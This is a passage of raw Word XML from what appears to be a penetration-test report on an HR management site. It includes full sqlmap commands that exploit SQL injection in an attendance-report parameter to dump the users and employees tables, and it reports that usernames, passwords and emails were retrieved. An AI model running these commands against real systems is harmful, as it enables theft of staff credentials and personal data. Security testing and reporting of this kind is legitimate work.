        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00421669">
        <w:t xml:space="preserve"> used to enumerate the table.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="008C48DE" w14:paraId="64FEBC30" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="125F16EA" w14:textId="582C8E21" w:rsidR="008C48DE" w:rsidRDefault="008C48DE" w:rsidP="00FD1EBC">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t>ython</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve"> sqlmap.py --timeout 100 --random-agent --cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t xml:space="preserve">="&lt;ci_session&gt;" </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t>https://hrcms-admin.tri-niche.com/attendance_report_emp?startend=2022-01-17+-+2022-01-17*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> --columns -D trindrdb_hrcms</w:t>
            </w:r>
            <w:r w:rsidR="005B734B">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -T users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="31266D38" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="2A38DB3B" w14:textId="77777777" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001C5FFB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FC066A0" wp14:editId="716142C7">
            <wp:extent cx="5812286" cy="3269411"/>
            <wp:effectExtent l="0" t="0" r="0" b="762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28306" cy="3278422"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA46185" w14:textId="77777777" w:rsidR="008B31F8" w:rsidRDefault="008B31F8" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="1BE2B0D4" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06683121" w14:textId="5CEF5114" w:rsidR="008B31F8" w:rsidRDefault="008B31F8" w:rsidP="00447E29">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As seen below, the </w:t>
      </w:r>
      <w:r w:rsidR="00FA709F">
        <w:t>columns of the table were</w:t>
      </w:r>
      <w:r w:rsidR="001F6F09">
        <w:t xml:space="preserve"> successfully enumerated with username and password </w:t>
      </w:r>
      <w:r w:rsidR="007F3EF1">
        <w:t>attributes</w:t>
      </w:r>
      <w:r w:rsidR="00884412">
        <w:t xml:space="preserve"> shown</w:t>
      </w:r>
      <w:r w:rsidR="007F3EF1">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="000848DF" w:rsidRPr="000848DF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623F30C3" w14:textId="4002D9DF" w:rsidR="001F0A6F" w:rsidRDefault="000848DF" w:rsidP="001C5FFB">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658326" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51A12A78" wp14:editId="7EB740E2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>571499</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1729649</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="615043" cy="587829"/>
                <wp:effectExtent l="0" t="0" r="13970" b="22225"/>
                <wp:wrapNone/>
                <wp:docPr id="220" name="Rectangle 220"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="615043" cy="587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E96295">
              <v:rect id="Rectangle 220" style="position:absolute;margin-left:45pt;margin-top:136.2pt;width:48.45pt;height:46.3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AC65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PRgwIAAGg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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21179FDB" wp14:editId="64885A06">
            <wp:extent cx="4771242" cy="2683824"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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89127" cy="2693884"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F3F578" w14:textId="77777777" w:rsidR="007930FA" w:rsidRDefault="007930FA" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="15277454" w14:textId="3A1679FD" w:rsidR="007930FA" w:rsidRDefault="007930FA" w:rsidP="00447E29">
      <w:r>
        <w:t>Enumeration of the contents of the table can proceed by using the following command.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="007930FA" w14:paraId="7171D07D" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AAB1C84" w14:textId="59562093" w:rsidR="007930FA" w:rsidRDefault="007930FA" w:rsidP="00DF0C05">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t>ython</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve"> sqlmap.py --timeout 100 --random-agent --cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t xml:space="preserve">="&lt;ci_session&gt;" </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t>https://hrcms-admin.tri-niche.com/attendance_report_emp?startend=2022-01-17+-+2022-01-17*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> --dump -D trindrdb_hrcms</w:t>
            </w:r>
            <w:r w:rsidR="005B734B">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> -T users</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BBADB21" w14:textId="77777777" w:rsidR="007930FA" w:rsidRPr="00294107" w:rsidRDefault="007930FA" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="236F2AF6" w14:textId="7DC840E7" w:rsidR="00D15D38" w:rsidRDefault="001F0A6F" w:rsidP="00B040D1">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A300856" wp14:editId="38A6A0E7">
            <wp:extent cx="5106839" cy="2872596"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>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19472" cy="2879702"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8FBEBE" w14:textId="6D69ED6E" w:rsidR="003205DA" w:rsidRDefault="00CC23EA" w:rsidP="001F0A6F">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00D81C80">
        <w:t>information</w:t>
      </w:r>
      <w:r w:rsidR="00FB249B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00277C35">
        <w:t>consists</w:t>
      </w:r>
      <w:r w:rsidR="00D81C80">
        <w:t xml:space="preserve"> of</w:t>
      </w:r>
      <w:r w:rsidR="00481D1E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC40A3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00481D1E">
        <w:t>username, password, and email</w:t>
      </w:r>
      <w:r w:rsidR="00E829C6">
        <w:t xml:space="preserve"> of the users</w:t>
      </w:r>
      <w:r w:rsidR="009F76D5">
        <w:t xml:space="preserve"> which was successfully </w:t>
      </w:r>
      <w:r w:rsidR="00143995">
        <w:t>re</w:t>
      </w:r>
      <w:r w:rsidR="00D0355F">
        <w:t>trieved</w:t>
      </w:r>
      <w:r w:rsidR="00481D1E">
        <w:t xml:space="preserve">. Based on this table, </w:t>
      </w:r>
      <w:r w:rsidR="00DC40A3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00481D1E">
        <w:t xml:space="preserve">status indicates whether an account is active or </w:t>
      </w:r>
      <w:r w:rsidR="005A20D7">
        <w:t xml:space="preserve">has been </w:t>
      </w:r>
      <w:r w:rsidR="00481D1E">
        <w:t xml:space="preserve">deactivated while </w:t>
      </w:r>
      <w:r w:rsidR="00DC40A3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00481D1E">
        <w:t xml:space="preserve">level indicates whether the account has administrative privilege. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363B1826" w14:textId="49A40CD1" w:rsidR="00B101A3" w:rsidRDefault="00CC3F46" w:rsidP="00172512">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658327" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="599DC13A" wp14:editId="518EB8A7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>952182</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4392386" cy="1976437"/>
                <wp:effectExtent l="0" t="0" r="27305" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="221" name="Rectangle 221"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4392386" cy="19764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3504DA">
              <v:rect id="Rectangle 221" style="position:absolute;margin-left:0;margin-top:74.95pt;width:345.85pt;height:155.6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1C182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xrhAIAAGo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">
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00580196">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="10949481" wp14:editId="0525D9B7">
            <wp:extent cx="5943600" cy="3344545"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="18946421" name="Picture 1894642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21" name="Picture 18946421" descr="A computer screen capture&#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1E5BF1F" w14:textId="77777777" w:rsidR="003512C5" w:rsidRDefault="003512C5" w:rsidP="003512C5"/>
    <w:p w14:paraId="4C23BF53" w14:textId="3A4EA0CF" w:rsidR="00B101A3" w:rsidRDefault="00720E7A" w:rsidP="00447E29">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="003A58CD">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="009931C0">
        <w:t>mployees</w:t>
      </w:r>
      <w:r w:rsidR="00D15E13">
        <w:t xml:space="preserve"> table </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">which </w:t>
      </w:r>
      <w:r w:rsidR="00D15E13">
        <w:t xml:space="preserve">was also seen earlier can be </w:t>
      </w:r>
      <w:r w:rsidR="00E314FB">
        <w:t>enumerated</w:t>
      </w:r>
      <w:r w:rsidR="004E2811">
        <w:t xml:space="preserve"> using the same method. However, </w:t>
      </w:r>
      <w:r w:rsidR="000433BC">
        <w:t>after analyzing the</w:t>
      </w:r>
      <w:r w:rsidR="00830DA7">
        <w:t xml:space="preserve"> pattern</w:t>
      </w:r>
      <w:r w:rsidR="003762B7">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00830DA7">
        <w:t xml:space="preserve"> of the</w:t>
      </w:r>
      <w:r w:rsidR="000433BC">
        <w:t xml:space="preserve"> column names based on the error messag</w:t>
      </w:r>
      <w:r w:rsidR="00492166">
        <w:t xml:space="preserve">e seen during the manual testing phase, </w:t>
      </w:r>
      <w:r w:rsidR="004E2811">
        <w:t>a custom list of possible colum</w:t>
      </w:r>
      <w:r w:rsidR="00B54F71">
        <w:t>n names</w:t>
      </w:r>
      <w:r w:rsidR="004E2811">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00846EA7">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="00572D0F">
        <w:t xml:space="preserve"> created and</w:t>
      </w:r>
      <w:r w:rsidR="004E2811">
        <w:t xml:space="preserve"> used instead of the default list</w:t>
      </w:r>
      <w:r w:rsidR="00D42E21">
        <w:t xml:space="preserve"> to enumerate the columns</w:t>
      </w:r>
      <w:r w:rsidR="00681C25">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00846EA7" w:rsidRPr="00846EA7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D52FF" w14:textId="757BE64F" w:rsidR="001F0A6F" w:rsidRDefault="00846EA7" w:rsidP="00ED0AE0">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658328" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F7E838B" wp14:editId="35FF94E9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>272143</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>339816</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="527957"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24765"/>
                <wp:wrapNone/>
                <wp:docPr id="222" name="Rectangle 222"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="952500" cy="5279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B79BDC">
              <v:rect id="Rectangle 222" style="position:absolute;margin-left:21.45pt;margin-top:26.75pt;width:75pt;height:41.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F585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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6190AFBD" wp14:editId="19935710">
            <wp:extent cx="5604802" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946369" name="Picture 189463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69" name="Picture 18946369" descr="Graphical user interface, tex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r="42265" b="80464"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5613895" cy="1068531"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8AB682" w14:textId="77777777" w:rsidR="00ED0AE0" w:rsidRDefault="00ED0AE0" w:rsidP="00ED0AE0"/>
    <w:p w14:paraId="66EA35F8" w14:textId="77777777" w:rsidR="00B040D1" w:rsidRDefault="00B040D1">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA9330" w14:textId="7FAEC026" w:rsidR="007A2A07" w:rsidRDefault="007A2A07" w:rsidP="00447E29">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Using the following command below, the columns of the </w:t>
      </w:r>
      <w:r w:rsidR="00F524EE">
        <w:t xml:space="preserve">employees </w:t>
      </w:r>
      <w:r>
        <w:t>table would be enumerated followed by retrieving the contents of the table.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A2A07" w14:paraId="26775FDF" w14:textId="77777777" w:rsidTr="00E16B00">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E77013D" w14:textId="68F7093C" w:rsidR="007A2A07" w:rsidRDefault="007A2A07" w:rsidP="00E16B00">
            <w:r>
              <w:t>p</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t>ython</w:t>
            </w:r>
            <w:r>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve"> sqlmap.py --timeout 100 --random-agent --cookie</w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t xml:space="preserve">="&lt;ci_session&gt;" </w:t>
            </w:r>
            <w:r w:rsidRPr="00DA76B8">
              <w:t xml:space="preserve">-u </w:t>
            </w:r>
            <w:r w:rsidRPr="008E3137">
              <w:t>https://hrcms-admin.tri-niche.com/attendance_report_emp?startend=2022-01-17+-+2022-01-17*</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> --dump -D trindrdb_hrcms2 -T employees</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="54B00632" w14:textId="77777777" w:rsidR="007A2A07" w:rsidRPr="00294107" w:rsidRDefault="007A2A07" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="2885CC77" w14:textId="4C421348" w:rsidR="001F0A6F" w:rsidRDefault="00B85182" w:rsidP="00F962A5">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658332" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D4076B0" wp14:editId="22E410F6">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>613571</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2156644</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2438400" cy="494998"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19685"/>
                <wp:wrapNone/>
                <wp:docPr id="238" name="Rectangle 238"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2438400" cy="4949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FCAFD9">
              <v:rect id="Rectangle 238" style="position:absolute;margin-left:48.3pt;margin-top:169.8pt;width:192pt;height:39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303C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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1488AABB" wp14:editId="74B88AEA">
            <wp:extent cx="4714875" cy="2652116"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946370" name="Picture 189463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70" name="Picture 18946370" descr="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30411" cy="2660855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E43DB39" w14:textId="5D5F9399" w:rsidR="007F505D" w:rsidRDefault="007F505D">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADEDB06" w14:textId="624DC32F" w:rsidR="00C32A97" w:rsidRDefault="00303D8F" w:rsidP="00447E29">
      <w:r>
        <w:t xml:space="preserve">The records of the employees table </w:t>
      </w:r>
      <w:r w:rsidR="005B6507">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> successfully enumerated. As seen below, based on the result, </w:t>
      </w:r>
      <w:r w:rsidR="008A0F9E">
        <w:t>it is similar to the Users table</w:t>
      </w:r>
      <w:r w:rsidR="00447E29">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="008A0F9E">
        <w:t xml:space="preserve"> but the </w:t>
      </w:r>
      <w:r w:rsidR="00F966A9">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="008A0F9E">
        <w:t xml:space="preserve"> account </w:t>
      </w:r>
      <w:r w:rsidR="00D33740">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="008A0F9E">
        <w:t>not present.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5ED924" w14:textId="185BEF46" w:rsidR="00B040D1" w:rsidRDefault="00D00162" w:rsidP="00EB07B2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658329" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0506815A" wp14:editId="73B91436">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>554433</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>834356</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3189515" cy="1520764"/>
                <wp:effectExtent l="0" t="0" r="11430" b="22860"/>
                <wp:wrapNone/>
                <wp:docPr id="235" name="Rectangle 235"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3189515" cy="1520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F18776">
              <v:rect id="Rectangle 235" style="position:absolute;margin-left:43.65pt;margin-top:65.7pt;width:251.15pt;height:119.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1B84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aIhQIAAGo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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="631E2F6C" wp14:editId="122AF058">
            <wp:extent cx="4826000" cy="2714625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="18946371" name="Picture 1894637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71" name="Picture 18946371" descr="A computer screen capture&#10;&#10;Description automatically generated with medium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58084" cy="2732672"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E81A4B1" w14:textId="0E97934D" w:rsidR="00EC39D2" w:rsidRDefault="00EC39D2" w:rsidP="00447E29">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Since the information </w:t>
      </w:r>
      <w:r w:rsidR="00144924">
        <w:t>was</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dumped, </w:t>
      </w:r>
      <w:r w:rsidR="00917FDA">
        <w:t xml:space="preserve">it would automatically create a </w:t>
      </w:r>
      <w:r w:rsidR="00F7122C">
        <w:t xml:space="preserve">CSV file containing the information that was retrieved earlier. As seen below, it created </w:t>
      </w:r>
      <w:r w:rsidR="00ED71BD">
        <w:t>and formatted users.csv.</w:t>
      </w:r>
      <w:r w:rsidR="009A5D43">
        <w:t xml:space="preserve"> Attackers can easily leverage or create a program to crack the passwords and publicly disclose the information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45093CC6" w14:textId="1DD0770F" w:rsidR="006F4B2E" w:rsidRDefault="001F0A6F" w:rsidP="00587F6B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71F8A3D2" wp14:editId="57074E07">
            <wp:extent cx="5741719" cy="3230330"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="18946372" name="Picture 1894637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72" name="Picture 18946372" descr="A computer screen capture&#10;&#10;Description automatically generated with medium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2732" cy="3230900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
